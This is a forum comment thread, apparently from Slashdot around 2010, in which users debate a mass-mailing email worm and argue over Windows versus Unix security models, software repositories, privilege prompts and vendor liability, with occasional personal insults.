I've been using Linux with almost complete exclusivity for more than a decade (and the times I used Windows in between was because of working considerations not for my own stuff) so I positively know that making the choice is possible, maybe a bit hard, but possible, so I sadly must correct your previous sentence to "less-powerful side is no longer *wanting* to make a truly free choice". As long as citizens gladly behave like lambs, greedy will behave as wolves.

Re:So that's why the UW mail system went down

[hairyfeet]

Bingo! everyone is looking at this from a technical aspect, and its not a technical problem its a case of the dancing Bunnies. The user KNOWS it is quite possibly hinky and they don't care because they want to see the bunnies. As long as the user has ANY abilities to actually place software on the machine, in other words if we don't all want to live in walled iGardens, then we will simply have these problems...period. Because that is why social engineering works, they wave the bunny, and the user happily bypasses any roadblocks to see said bunny.

Re:So that's why the UW mail system went down

[causality]

I can't believe you took the time to write that much.

Point I was making: what you're calling negligence, isn't. If your house gets broken into, you don't get to sue the lock manufacturer because tumblers are so easy to pick. If your car breaks down because you never change the oil, you don't get to sue Ford. If you can't program your VCR clock because you're an idiot, you don't get to sue RCA. And if you fail to grasp these simple concepts, don't expect to be taken seriously.

And no, I would never want OS manufacturers to be held to the same standards as the car industry, since this would effectively kill off the Open Source movement.

Hang on, I need to approve or disapprove of the amount of writing you did before I can respond to your point. Did too much? Damn you're wordy. Not enough? Clearly you're too lazy. -- I think that makes the point. Reserve the personal shit for someone who desires your opinion, it will be much more effective. Moving on from your self-flattery...

If the lock manufacturer kept advertising "more secure than ever!" you might have a case. If Ford advertised "more maintainence-free than ever!" you might have case. If RCA advertised "easier to program than ever before!" you might have a case. They don't. Usually those companies make no claims at all about any of these things. The merit of their products is relative to their performance compared to the competition. But wait: all of those companies have real competition.

Microsoft is a blatant contrast to all of the above. Also, manufacturer liability makes no sense unless a profit is being made. Most Open Source is not distributed for a profit and is generally made available for no charge at all. It is when you as a customer are paying money that you can reasonably expect to receive something of value in return for that money that works as advertised. That's basic quid pro quo. When you are receiving something for free and no marketing promises are made to you then you don't have grounds to justify any such expectations. Thus it's perfectly reasonable to hold Microsoft to one legal standard and Open Source distributors to another; in fact it'd be unreasonable to do otherwise.

Re:So that's why the UW mail system went down

The entire UW mail system died yesterday morning.

Maybe this is why ...

It's an instance of the reason why. The actual reason is that the users still haven't learned from the last 9 years of experience. The only bad thing is that their stupidity is not self-contained and can affect the networks and computers of others. I say that because this time, it isn't really a technical flaw in Windows since I don't see any reports of the e-mail attachments being automatically executed. This is more like a social engineering attack. It's one that is not remotely new and has provided numerous examples that the even slightly clueful have already learned from.

Should not have moved off of Groupwise

LOL

Re:So that's why the UW mail system went down

[dbcad7]

Ok.. I have received an email with an executable file.. please list the steps necessary for me to run it.. I'll wait... ok.. Oh really ? it's that simple ?.. I can't imagine why these tricks don't work on Linux users.. sheesh, I'm scared now.

Re:So that's why the UW mail system went down

[c6gunner]

When Microsoft touts the "Ease of Use" of their product, clearly they're speaking to the portion of the population with an IQ higher than room temperature. Apparently you're not part of their target demographic. May I offer an alternative?

Re:So that's why the UW mail system went down

[SheeEttin]

Back on topic, what you mention is a very good idea. It's also not new to Apple products at all. That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located is read-only.

Irrelevant. How easy would it be to prepend ~/bin to $PATH and stick it in there?
You only need permission to bind to ports
(Of course, if you wanted to replace a system binary, yeah, you'd need root permissions... But why do that when it's easiest just to do as above?)

Re:So that's why the UW mail system went down

[DI4BL0S]

Limit Repo's to trusted RA certs and make it unbearably difficult for non-technical users to add self signed certs to a trusted list (specific to repo's maybe)
none technical click-happy users should be protected from themselves with force and I don't see any problem with limiting repo's to trusted RA's, which kicks the ball into repo owners to get trusted certs before they can get their repo exposed...

Re:So that's why the UW mail system went down

Wasn't pine a U of W creation?

Re:So that's why the UW mail system went down

[ampmouse]

Hey, at least you aren't at that other state university. The one that uses microsoft hosted outlook. If you want an unreliable, insecure, windows only email solution with the same privacy implications as hosted Gmail, Try Outlook Live!

Oh, and just to clarify, this is not an option offered by the university, this is the only option.

Re:So that's why the UW mail system went down

[drsmithy]

I think you fail to appreicate the proprietary nature of most Windows software. Even the freeware is closed-sourced and copyrighted in such a way that you are not authorized to redistribute it. That means you cannot legally operate a repository containing a library of Windows software from a single source, because you'd have to get written permission from the authors of each individual piece of software allowing you to redistribute their software from your single source. It'd be an absolute nightmare and one mistake would make you end up on the wrong end of a lawsuit.
That is, of course, not beginning to address the issues surrounding the redistribution of commercial for-pay software. Redistributing that without the express blessing of the creator is usually called "piracy" and may be severely punished by the civil courts.

This is what's called a straw man.

It's a particularly ridiculous one, as well, since by its logic neither brick and mortar, nor online, software stores (like, say, Steam) could exist due to exactly the same copyright and licensing problems. Hopefully the stupidity of this line of reasoning is obvious.

Incidentally, there's no need for Microsoft to maintain a repository of software on behalf of others. All they need is a portal that links to registered products directly from the vendors themselves.

The only way around this would be for Microsoft to create a walled-garden type of environment sort of like Apple's App Store. Then they could dictate what licenses and/or terms of copyright are and are not acceptable. But you better believe that this would raise monopoly issues when that single vendor controls over 90% of the marketshare. Want your software to reach 90% of all desktop users? Then you play by their rules, or else. At that point the software license is no longer between the vendor and the user who is their customer; Microsoft is now the referee whether or not this is against the will of the vendor or user.

There is no _requirement_ whatsoever for any special or unique licensing terms to exist. None.

A centralized package manager for Windows is such a great idea that it would have been implemented by now except that there are some damned good reasons why such a thing is destined to fail miserably.

Package managers exist primarily to address problems that essentially doesn't exist on Windows - or most other platforms for that matter - locating software that will work on your particularly branch of a fractured, inconsistent, unstable platform and minimising dependency hell.

Finally, your whole premise is broken. The proportion of malware distributed as genuine and legitimate software is practically nonexistent. The same people who are prepared to open up password protected zipfiles in Windows and execute the contents will be chomping at the bit to chmod +x an email attachment so they can see the dancing bunnies.

Re:So that's why the UW mail system went down

[causality]

When Microsoft touts the "Ease of Use" of their product, clearly they're speaking to the portion of the population with an IQ higher than room temperature. Apparently you're not part of their target demographic. May I offer an alternative?

You're certainly a single-minded one. The subtle disapproval of how I express myself was recognized and rejected so you decided you'd just try harder with a more blatant form of making this personal. Trying to insult me is a sorry substitute for arguing against my position. You can't make me deviate from my position no matter how hard you try to make this personal.

Most users of Windows are not technically skilled and there's no way that Microsoft doesn't know this. When they tout "ease of use" they are not making an effort to restrict their audience to the technically skilled. When the unskilled purchase Windows, their money is just as green as the skilled users' money. That's why Microsoft likes this arrangement and has no interest in limiting it.

I want Microsoft to either clearly state that their products are not intended for the technically unskilled or take on the liability for suffering caused by ignorant users who buy into their hype about security and ease-of-use. All of the childishness and belligerence you can possibly summon won't alter this logic. Now, if you have what it takes, then either demonstrate with solid reasoning why my logic is faulty or admit that you cannot.

Re:So that's why the UW mail system went down

[drsmithy]

Perhaps they should just have to explicitly state that they want to run an downloaded program. Enter their password and read a warning.

Ignoring for a second this is the system already in place...

History has demonstrated _repeatedly_ that it doesn't work. Heck, there are malware variants that require the end user to open a password-protected zipfile and execute the contents. Throwing another "are you sure" dialog up does nothing whatsoever to stop people from trying to see the dancing bunnies.

The fundamental problem is this: you cannot secure a platform where an ignorant end user is allowed to run arbitrary software at elevated privileges.

Re:So that's why the UW mail system went down

[93+Escort+Wagon]

Hey, at least you aren't at that other state university. The one that uses microsoft hosted outlook. If you want an unreliable, insecure, windows only email solution with the same privacy implications as hosted Gmail, Try Outlook Live!

Oh, and just to clarify, this is not an option offered by the university, this is the only option.

Well, we have that as an option too - but it's only an option, and since Gmail has the mindshare most of the students go for that (actually, most just forward everything to their personal Gmail account, honestly).

It is funny how, over the course of the past 5-6 years, Microsoft has lost most of its mindshare - with younger people anyway; but that's who really matters in this.

From what I can tell, the only people choosing the hosted Outlook solution are people directly under soon-to-be-ex-President Emmert's sway. But I'm sure loads o' Microsoft cash had nothing to do with his choice, nor the golf outings with Ballmer...

Re:So that's why the UW mail system went down

Yes, users are stupid, they never learn... oh, wait, it's our job to either protect them or educate them.

I think tomorrow I'm going to have to have a little talk with all my stupid users.

Really, this looking down on our customers is part of what gives IT a bad rap.

Re:So that's why the UW mail system went down

[GravityStar]

The problem with Windows is the vast amount of software that is poorly designed and wants Admin privileges even though it could be designed to carry out its task without them.

I run Windows as a limited user. It never was the majority of programs. Since 2005-2006, the amount of times I need to inappropriately switch to Administrator has shrunk to 0. The amount of defective programs encountered is a bit higher, but near 0. Since then, it has just been easier to find an alternative to the defective program, rather than to run it as Admin.

Re:So that's why the UW mail system went down

[hairyfeet]

Actually I have found that Windows ALREADY HAS something similar, you just have to tell folks to go there...its called Ninite. As a PC repairman I've found a good 80-90% of the "I can't open X" "I want to (insert task)" can simply be taken care of by pointing them to Ninite. And yes you can have proprietary as well as FOSS, as Ninite has MS Office 2k7 trial alongside OO.o. It would be trivial for MSFT to create something similar, as I'm sure many software houses would loooove to have their software offered alongside MSFT's in a Windows Update style "app store".

The REAL problem would be MSFT getting buried alive in lawsuits. Look at all that BS in the EU over the browser, when it is so fucking trivial to change a browser nowadays it ain't even funny. Can you imagine the lawsuits from every company whose crapware wasn't included? You'd have Real having a fit their bloatware wasn't included, or Apple having a fit the first link under media players wasn't iTunes, it would be a fricking mess. Hell I was amazed they were even allowed to put Windows Defender in, I figured the anti-spyware companies would have a shitfit.

So lets be honest folks, the kind of real changes it would take to really kill this kind of threat, like making it really hard to install apps not signed by MSFT or having a default repo, would end up with MSFT being sued for the next 20 years and tied up in court forever. I don't see why so many guys here have a shitfit about MSFT anyway, it is pretty obvious the next wave will be the phone and ultramobile space, and it is pretty damned obvious by now MSFT sucks at mobile and have a snowballs chance in hell of getting that monopoly. Nope the funny part is everyone will just replace Darth Gates with Darth Jobs, All Hail Steve! Sadly talking to folks I've found this video to practically be a documentary.

Re:So that's why the UW mail system went down

[KahabutDieDrake]

So you want microsoft to take liability for their users inability to operate the machine? Do you know how that's going to look in court?
ATT: Did you read the user manual?
LUSER: There is a manual?
JUDGE: Facepalm
JURY: obviously you should have
ATT: smiles evily.

Re:So that's why the UW mail system went down

[hairyfeet]

Hi MR AC! Sorry for being OT, but I'm afraid you cause the big brain hurt and I wants to know why, oh why, did you use Anonymouse to go to a fucking MSFT kb article? Are you afraid MSFT is gonna hunt you down and beat you? It isn't a porn site, I doubt anyone is gonna have a shitfit, even if you have a strict boss, that you looked at a MSFT kb article, so why MR AC, why?

Re:So that's why the UW mail system went down

I didn't do it intentionally. I used Anonymouse because I reached the posting limit. But when you preview a post using it, the website rewrites the URLs in the message body. I forgot to re-edit the link before submitting the post again. Oops! Sorry. Actual link: KB925330.

Re:So that's why the UW mail system went down

[kwbauer]

So, *nix users generally only get their apps from an app-store except we say that we are getting executables from a repository. Who acts as the gatekeeper for the repository? If it is fully open so that anybody can put anything in, then what prevents malware from getting in it. If only a blessed few are allowed to put something in, then how is this really different than Apples app store?

Just askin'.

Correct, I haven't used a *nix variant since college nearly 20 years ago.

Wrong, I use Windows at home and work but my wife and daughter own a couple of older iPods.

Re:So that's why the UW mail system went down

[cbhacking]

I don't know what versions of Outlook or Thunderbird you're talking about specifically, but TB 3 is still well behind Outlook 2010, and TB 2 was in many ways a worse email client than Windows Mail (the free Outlook Express++ that came with Vista). Thunderbird is a good email client, but it's definitely not a great one. It is lighter weight than Outlook, at least aside from its indexing (which is always going to be somewhat performance-intensive) but on a modern desktop or even most laptops the difference is negligible.

Re:So that's why the UW mail system went down

You fail to recognize that despite these users on GNU/Linux aren't installing random software. They have a specific place to go to get software. It is very simple to educate users on what is and is not safe. You say "Ubuntu Software Center is safe. If you want or need to install anything else call technical support. Here is the number- 1-888-39-THINK, (or whatever the company is that sold the systems/support/os/etc)" It is that simple. In Microsoft-land you're basically stuck wondering and can easily click stuff and unintentionally get infected. You don't even have to do that. Not to mention all the core applications on GNU/Linux have security updates through the package management systems. You're flash players, office software, and operating system files that are going to be vulnerable and easily attackable and effect a wide population of users just aren't vulnerable because patches get pushed through to users for all the applications and not just some. A users clicks one button to update everything not hundreds of buttons for each application that needs updating. It's allot easier and less complicated than having to update AV software, Java, Adobe Flash, Firefox, MS Windows, e-mail client software, amongst possibly hundreds of other applications. Microsoft Windows users who self-administrator spend thousands of dollars on anti-virus and virus removal software INDIVIDUALLY. Staples, BestBuy, etc usually sell Norton 360 for $69.99 per year. And users still get infected. That means every few years (if not more) customers need to spend an additional $200 on virus removals (once again staples, BestBuy prices- the $69.99 intro prices they run are gimmicks and worthless- it's just so they can up-sell on the system restore, data backups, os reloads, and software installation services amongst others and new AV software).

Re:So that's why the UW mail system went down

[Chris+Tucker]

"That would sit better with me than the Apple "We fucking own you" approach that requires you to physical hack the product you just "bought.""

Yeah, here's the thing:

YOU are not the target audience for the iPod/iPad/iPhone.

YOU are have never been the target audience for the iPod/iPad/iPhone.

YOU will never be the target audience for the iPod/iPad/iPhone.

The reason that the iPod/iPad/iPhone are such phenomenal best sellers is that the vast majority of people BUYING the iPod/iPad/iPhone, don't care a fat rat's ass about hacking their iPod/iPad/iPhone.

They just want it to work. They just want a seamless, one click method to get files from the iTunes Store or the App Store onto their iPod/iPad/iPhone.

What you think is immaterial to them. What IS material to them is that it just works.

So, do continue to vent your spleen here at /., where you'll find a ready and enthusiastic audience.

Keep in mind that you are, essentially, pissing into the wind.

All that's going to happen is that you wind up with a facefull of your own piss and Steve Jobs makes another few hundred million dollars.

kthnxbai!

Re:So that's why the UW mail system went down

[prichardson]

I see by your Facebook page that you mean the University of Washington. The REAL UW (Wisconsin) had no trouble with email today.

Re:So that's why the UW mail system went down

[jimicus]

I'd point out a few things here:

1. If, as a mail admin, you are still allowing Windows executables of any description through your system, you should be shot. Hell, Microsoft publish a list of potentially dangerous filetypes you might want to block in email, so you've really got zero excuse. Let's face it, if education was going to work it would have done so years ago.

2. If, as a desktop admin, your users are using a mail client that allows them to just randomly open Windows executables and is not/cannot be configured otherwise, you also should be shot. Outlook has gone out of its way to make it difficult to open executable attachments for some time.

3. Of those 9 years:

    - 5 or 6 days has been spent teaching that "opening every attachment you see is a Bad Idea".
    - 8 years, 361 days have been spent teaching that "the correct way to deal with any popup you see is to click on the first button on it that'll get rid of the thing. No point in reading it, they never say anything useful anyway."

Re:So that's why the UW mail system went down

[jimicus]

The problem with Windows is the vast amount of software that is poorly designed and wants Admin privileges even though it could be designed to carry out its task without them.

Going back to the original point of this entire topic, why would an application need admin privs in order to send copies of itself to every email address it can find? Bearing in mind that if "requires admin privs" is the only thing you can think of to prevent malware from executing, you're going to be in serious trouble sooner or later.

Re:So that's why the UW mail system went down

[Ihmhi]

I've done computer repair freelance (as well as the requisite "family and friends try to mooch for free" package) for many years. In my experience the "average user" treats a computer like an appliance. The iPad and similar devices basically seem to be just that, and people are happy with it.

I have the feeling that the next step Apple will take is a "simple Mac" that runs on the same sort of OS as the iPad and iPod - a little more flexible and powerful but essentially as idiot-proof as possible.

Re:So that's why the UW mail system went down

[Dr_Barnowl]

Yes, it is. But you have to, download it, save it, set the executable bit, and then run it.

The core problems in Windows that enable this ;

• The shell decides which file types are executables based on the file name extension
• The shell, by default, is configured to hide the file name extension from the user
• The shell trusts executable files to be able to choose their own icon
• There is no executable bit in the filesystem

This means files like MyHappyDocumentAndNotAnEvilWorm_pdf.scr can pass themselves off as a PDF file by having a PDF icon, but will be executed as soon as a user double clicks them (because they have the obscure but "executable" extension for screen savers, which are just normal executables).

On Unix...

• The shell makes it's own mind up about what a file is, it doesn't trust the extension
• The shell presents a single icon for binary executables, and a single icon for scripts
• The user has to explicitly set the executable bit on anything they download

All of which means that they are not so easy to take in with this particular variant of user-exploit.

Re:So that's why the UW mail system went down

[tendays]

That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located is read-only.

System-wide programs are stored in directories not writable by normal users, but that doesn't prevent a user from downloading a trojan into his own directory and running it, which is what the parent was talking about.

Unix systems do offer the option to mount /home (and other mount points like /tmp where the user has write access) with -o noexec which would close that issue, but I've never seen a linux distribution that would do that by default, because users expect to be able to run programs they've downloaded without having to jump through hoops.

Re:So that's why the UW mail system went down

[c0mpliant]

Post hoc ergo propter hoc

Re:So that's why the UW mail system went down

[TheRaven64]

On a well-designed system, an app would only be able to access system libraries that had the correct capability flags, files in a private per-app directory, and files that the user explicitly allowed it to access. You'd run it and it would then require the user to grant it access to the address book, and the user to grant it the email-sending capability or the network-access capability. This, by the way, is almost exactly the security model employed by the Symbian EXA2 kernel.

Giving users a binary choice to either not run the program, or run it with all of the privileges that they have, is a terrible design decision. Programs should start with a small set of privileges - enough to do most things, but not to compromise the system - and need to explicitly request others.

Re:So that's why the UW mail system went down

[c6gunner]

I understood what you were saying, which is why I think you're retarded. There is no manufacturer anywhere in the world that is expected to "make an effort to restrict their audience to the technically skilled". Your blind hatred of MS and your petulant demands are completely irrelevant, since you've demonstrated absolutely no reason why such an exception should be made.

I'm sorry that you found my previous comment offensive - I was merely trying to be helpful. Perhaps the product I linked to required too much "technical proficiency" for your taste - let me try again.

Re:So that's why the UW mail system went down

Personally I have only three:
- no threaded view in Outlook (actually there is supposed to be one, but I have never found how to switch to it.)
- taking a mail in the "sent items" and pressing reply writes a mail to yourself. Taking it literally that is correct, but it's still idiotic: I obviously want to amend my previous mail. Few people want to talk to themselves via email.
- pissing contest between Office and OS developers at Microsoft (if you e.g. want to disable ClearType you have to do it twice: once in the system settings and once in Outlook).

Re:So that's why the UW mail system went down

[node_chomsky]

I believe you, I am just saying that the presence of a phone and SMS makes them more different then you are implying. Not to mention, price and contractual commitments are involved with phones. The iPod is still more of a 'smart' MP3 player than a 'dumbed-down' cellular phone.

Re:So that's why the UW mail system went down

[SL+Baur]

How easy would it be to prepend ~/bin to $PATH and stick it in there?

Irrelevant. /home should be mounted noexec unless you're a software developer and even then it's probably better to set up a special area that you don't normally touch to do program development.

But, you could set the system login scripts to forbid ~/bin, ., etc. being in the $PATH. And you can set $PATH to READONLY before allowing user .profile/.bash_profile/.zlogin etc. to execute. This can be defeated, but not without command line magic and it won't have any effect on the window manager.

Re:So that's why the UW mail system went down

[StuartHankins]

Distributions act as gatekeepers for the repositories. In the case of Fedora / RHEL, Red Hat is the gatekeeper. They not only compile their own packages (with their own tweaks) of software, but in the case of RHEL, they actively support those packages as well. It's similar with other distros.

In the end, it all comes down to reputation. We purchase RHEL for peace of mind, and for the servers that aren't critical we use Fedora. That gives me the opportunity to see what's coming up and stay current (Fedora is testing grounds for RHEL) as opposed to us running a no-charge no-support RHEL clone such as CentOS.

Re:So that's why the UW mail system went down

[TommyTumult]

The college freshmen of today never experienced the "2001 all over again", so they are ripe for the pickings of email bombs that look "old hat" to old farts like us.

I believe they call it Eternal September

Re:So that's why the UW mail system went down

[bl8n8r]

> The actual reason is that the users still haven't learned from the last 9 years of experience.

That's a nice and easy explanation, but it's false. When all you get from the email is a subject line that says "OMG! Reply now, lp0 on fire!" what do you expect a user to do? They have little choice but to open it in order to assess the issue correctly. It could be important, it could be a scam. You can no longer tell by the subject line.

The fail is on Microsoft. 9 years -- 9 friggin years (probably a lot longer), and this is still a problem. Why?? What's the problem with fixing the stupid application so the user can't shoot themselves in the foot just by opening an email? If the entire windows subsystem must rely on such a mechanism in order to function then it's a mega-massive-epic fail and Microsoft ought to be held accountable for it.

This is no different than a car manufacturer mounting a spear on the front of the car and then blaming drivers for stabbing pedestrians. Yes, they need to watch where they're going, but the DESIGN IS FRIGGIN FLAWED. fix it or nix it already.

Re:So that's why the UW mail system went down

I love how businesses think they need to use email.

Re:So that's why the UW mail system went down

[camperdave]

Programs should start with a small set of privileges - enough to do most things, but not to compromise the system - and need to explicitly request others.

The problem with this approach (good as it is) is that a constant stream of privilege elevation requests conditions the user into granting access by habit. That was one of the main complaints about Windows Vista.

Re:So that's why the UW mail system went down

[binarylarry]

Oh right, that's why Android has basically taken over the market.

Because no one wants their devices to be open but us geeks on slashdot.

Thank you for your informative reply.

Re:So that's why the UW mail system went down

[RaymondKurzweil]

If the lock manufacturer kept advertising "more secure than ever!" you might have a case. If Ford advertised "more maintainence-free than ever!"

God you must be quite sheltered, as I have seen such claims numerous times from such companies.

They still market how many miles the car can go before scheduled maintenance. And lock manufacturers that add another pin use that wording almost verbatim. Besides, "more secure than ever" is a relative measure, and arguably true even if the security is still poor.

Do you eat paint chips?

Re:So that's why the UW mail system went down

[surgen]

1. If, as a mail admin, you are still allowing Windows executables of any description through your system, you should be shot.

We might as well just allow the damn things through.

I needed to get an executable to someone in the next building. The email server stripped it out. So I threw it on some file sharing site and sent them a link. User clicks the link, gets the download. I've already trained users to click the link in email to the dropbox link in the email and grab the exe. Users are going to run untrusted code regardless of if it is attached or is at the end of a link.

The isn't any significant hurdle that can be put up that doesn't also block legit uses, it just creates another "only do this if you know you should" that gets worn out and ignored. I have to go to IT every time mp3s emailed to a radio station get quarantined. Is is no shock to me that users ignore all the safety nonsense, its a technical solution that not only tries to solve a non-technical problem, it doesn't even bother to solve the problem.

Re:So that's why the UW mail system went down

[RaymondKurzweil]

Now, if you have what it takes, then either demonstrate with solid reasoning why my logic is faulty or admit that you cannot.

Your logical deduction may not be faulty, so I'll at least admit that I can't find fault with it and concede.

But I'll go on to say that a number of your premises are dubious or detached from reality and you are a dilettante and without clue about economic realities and the complexity of the real world outside your inane logic puzzles, and even if you are allowed to use Windows, I don't hold Microsoft responsible. Sorry.

Re:So that's why the UW mail system went down

[cusco]

For ten years I nagged my mother to back up their business files. I created one-click procedures, batch files, anything. Backup to tape, CD, FTP site, and even just the grandkids' game PC. Ten years, and the only backups ever done was when I happened to be visiting. Last year her hard drive went belly-up and she lost everything. Does she back up now? No. (At least now my sister stops by occasionally, zips all new files and emails them to Mom's Gmail account.)

Re:So that's why the UW mail system went down

[Rockoon]

Ah but that's a direct refusal to utilize the software repos as a trusted source. Just because a user refuses to get their software from a trusted source does not constitute a flaw in the trusted source.

The original argument was that this worm represented an actual security flaw in Windows, rather than a willingness to run untrusted code.

Windows users run untrusted code because most of them dont have critical files, or in the case of work machines, they aren't their critical files. Calling their nephew to clean up the infected machine is all the effort they need to put in to fix the problem.

Additionally, a single central repository wont work for windows. The amount of demand from all sides would be too high. On the one side the number of package maintainers for a typical linux repository is relatively small because there arent a thousand new submissions per day. For windows, there would literally be way more than 1000 per day. On the other side, Linux repositories don't have a the better part of a billion people downloading programs so the bandwidth costs arent prohibitive.

The mainly-repository idea just doesnt work for Windows, and there are repositories that dont have package managers for windows that already exist (TUCOWS, etc.. this is nothing new.) The scale of the windows market is just too big for these to have a prophylactic effect, and also too big for these repositories to even keep up (most have given up.)

Re:So that's why the UW mail system went down

[wildstoo]

The same people who are prepared to open up password protected zipfiles in Windows and execute the contents will be chomping at the bit to chmod +x an email attachment so they can see the dancing bunnies.

omg.... DANCING BUNNIEZ?!?!?!?!

SUM1 EMAIL ME THE BUNNIEZ RITE NAO PLZKTHXBAI

***clicks the attachment so hard and fast the mouse catches fire***

Re:So that's why the UW mail system went down

[wildstoo]

You just described absolutely everybody I live and/or work with, you insensitive clod.

Re:So that's why the UW mail system went down

[TheRaven64]

That's not a problem with the approach, that's a problem with the implementation. It was also a problem with the early Java plugin. For example, most applications need to persistently store some data. A lot of apps need to open files created by other apps. Sugar has an elegant solution to this, where the standard file chooser dialog runs as a separate (more privileged) process and passes file descriptors back to the process that invoked it. The user has to select the file, but beyond that isn't aware that they are granting extra privileges to the application.

The user still gets prompted for things like network access, but it's relatively infrequent. The problem with Vista - like the rest of the NT kernel's security system - was that it made things too fine grained for the typical user to understand.

Re:So that's why the UW mail system went down

[pe1chl]

It is easy to setup Windows like that.
Just make sure the user is not an administrator, and create a policy to forbid executables in directories that are writable (like %USERPROFILE%).

Actually it is sad that so few admins actually do this.

Re:So that's why the UW mail system went down

[drsmithy]

That's why I'd like to see Microsoft forced to assume product liability so long as they market their software to the general public on the basis of "ease of use". Either market it to "technically knowledgable users only" or pay monetary damages to anyone and everyone who suffers in any way due to security issues.

When you can define "ease of use", "technically knowledgeable" and "security issues" objectively, let us know.

Re:So that's why the UW mail system went down

The college freshmen of today never experienced the "2001 all over again", so they are ripe for the pickings of email bombs that look "old hat" to old farts like us.

I think you just made the case for an argument that I've often seen; that the industry just re-invents itself every decade or so because the older "silverbacks" get dumped or pushed out, and the newer folks don't have a "history" that can be relayed to them. No wonder the industry is such a clusterfuck nowadays.

Re:So that's why the UW mail system went down

[Chris+Tucker]

And how much is an Android phone vs. the iPhone?

Particularly a subsidized by the carrier Android phone?

Thanks for playing. Vanna has some lovely parting gifts for you.

Re:So that's why the UW mail system went down

[binarylarry]

$199 is pretty much the industry standard for smartphones, you dumb fuck.

Re:So that's why the UW mail system went down

[Chris+Tucker]

Ah, yes. Gratuitous obscenity and insults.

Could you be any more the typical Slashdot user?

I think not.

Re:So that's why the UW mail system went down

[pe1chl]

The question is if you should be allowed to run an executable that you have downloaded and stored yourself.
It is easy to setup Windows in such a way that this is not possible, especially in a company environment (Active Directory with Group Policy).
Then users without special privileges cannot run any software that hasn't been installed by the system administrators. This includes any software found in (links from) mail.

Re:So that's why the UW mail system went down

That’s 6 words, or 1 acronym.

Re:So that's why the UW mail system went down

[clone53421]

MS Outlook is like IE. Slow, bloated, and crappy. Thunderbird is like Firefox.

Re:So that's why the UW mail system went down

[gnasher719]

But as you point out seat belts only work if people use them, and if you remember, there was a lot of resistance to the idea despite the evidence that seat belts save lives. My grandmother refuses to wear one to this day because it's "uncomfortable."

My grandchildren were told that my car cannot drive unless everyone is using their seatbelts. Eventually they figured out it was actually _me_ who doesn't drive :-) Didn't change the fact that the car wouldn't move without them wearing seatbelts. Maybe you should use that approach with your grandmother.

The other argument is of course that I most definitely won't have anyone sitting _behind me_ without seatbelt. I don't want to die because someone else doesn't want to wear a seatbelt.

Appropriate Prince song plays in the background

[TheRealMindChild]

"Tonight We're Gonna Party Like It's 1999"

Re:Appropriate Prince song plays in the background

[DiEx-15]

Sorry, Prince said the internet was dead.

Re:Appropriate Prince song plays in the background

[KingAlanI]

was that a coincidental selection? whether it is or not, LOL.
Reminded of when MC Lars' "Roommate From Hell" shuffled in on university freshman-movein-day

Got mimedefang?

[Shoeler]

People still allow .exe files through filters? Helllloooooo mimedefang...

Re:Got mimedefang?

[Technoodle]

I had a client that got a link to a .scr file. They thought it was suspicious but clicked it and ran it anyway. When will Users ever learn?

Re:Got mimedefang?

[gmuslera]

The actual file don't go in the mail, just the link to download it. mimedefang or antivirus at the mail server don't have anything to do with it.

Re:Got mimedefang?

[__aaqvdr516]

I was called to a co-workers office today. He told me that he received an email from someone in our company. He didn't remember the name of someone he had spoken with yesterday and assumed it was the person that he had talked to. He clicked the link and then witnessed the awesomeness that is this exact worm. I got to see the email. It had all the usual signs of being junk/scam/phishing/younameit. I then further continued to giggle as the company posted a warning on our main site page having already shutdown the mail server. By the time he had caught the worm in action it had operated for about 30 seconds and managed to get around 800 messages (and counting) in his outbox before he killed the process.

Re:Got mimedefang?

[Ryukotsusei]

It's not even that. The one we have at work was basically, here is the file you requested, with a link to some file sharing website link to a pdf file. Except if you looked at the address it wasn't even the right site. I got about 10 emails today with the "here you have" subject line, as well as 2 emails from people screaming not to open any suspicious emails. Yet I keep getting them..

Re:Got mimedefang?

it's even more malicious then you think. it immediately adds copies of itself to every external drive it can find along with auto run files to re-launch the infection.

Re:Got mimedefang?

[Zebai]

This message was propagating itself at my work, going through the corporate email list for the entire country one by one, I was still getting this message every 2 minutes before i left work today. The link itself was to a pdf, which is something we use quite often at work, only the method of attaching it seemed unusual. Personally the first one I received looked almost legit thought it was some contractor using some odd way to attach scanned document. Probably why it hooked itself onto so many people, my companies local firewall blocked the site to me but apparently such security is not nationwide.

Such things at my employer usually dont stay quiet, will probably hear about some security review along with some expensive public statements saying they are trying to see if this bug somehow obtained some customer data other than our corporate email list.

Re:Got mimedefang?

[jimicus]

Dear oh dear.

May I introduce you to MailScanner? It will also scan links and remove any that look like they link to something dodgy.

(And I don't have anything to gain from this - I'm just a very happy user).

Re:Got mimedefang?

800? That's it? I got a couple hundred of those emails from co-workers and my name starts with an "A" in the outlook directory and I'm about 1500 down in the list. It think we managed to give priority routing to the worm, because mail I actually wanted took about an hour to arrive.

The hell?

[goodmanj]

Stupid question from a Linux / Mac user:

Are there really operating systems in use in 2010 that let you write files to a system directory without entering an administrator password?

Re:The hell?

[al0ha]

Yes and actually Macs are one of them Mr. Snarky.

In the original account set up on your Mac perform the following

cd /
touch testfile
ls -l testfile

Whe-e-e-e-e-e-e!!!!!

Re:The hell?

[phantomcircuit]

No but there are plenty of users who automatically click "Allow"

Re:The hell?

Are there really people crazy enough to use operating systems released in 2001 in 2010? The answer is the same.

Re:The hell?

[drcheap]

Stupid question from a Linux / Mac user:

Are there really operating systems in use in 2010 that let you write files to a system directory without entering an administrator password?

Yes, because people will give a computer anything it asks for, especially if it asks in an ambiguous manner.

What's this? A UAC prompt asking for permission to "perform the action I requested"? Wait, what was I just doing? Oh yeah, reading email. Yes I want to do that. ]click[

Same thing would happen if you gave them a Linux/OSX box that asked for admin password. Granted M$ made it easier by not requiring one to actually type in any actual password to elevate privileges.

Re:The hell?

[Abcd1234]

Okay, now try replacing, say /bin/sh, and tell me how that works out.

Re:The hell?

[grasshoppa]

Vista/7, by default prompt.

Thanks to UAC in vista, folks have been well trained to just click "Yes" when prompted. So yes, this will be a threat.

Re:The hell?

[goodmanj]

Point taken, but unless I'm mistaken you can't do any shenanigans by creating new files in /.

If you could *edit* existing files in / or create files in a path directory, you'd be in business, but you can't: they're all owned by root.

Re:The hell?

Unless, like a good security-concerned netizen, you follow directions and reserve that original account for actual Administrative purposes, creating normal, non-privileged user accounts for all your users to surf, check email, and download worms with.

This works very well, especially when accounts for significant others and children are concerned.

Re:The hell?

[archmcd]

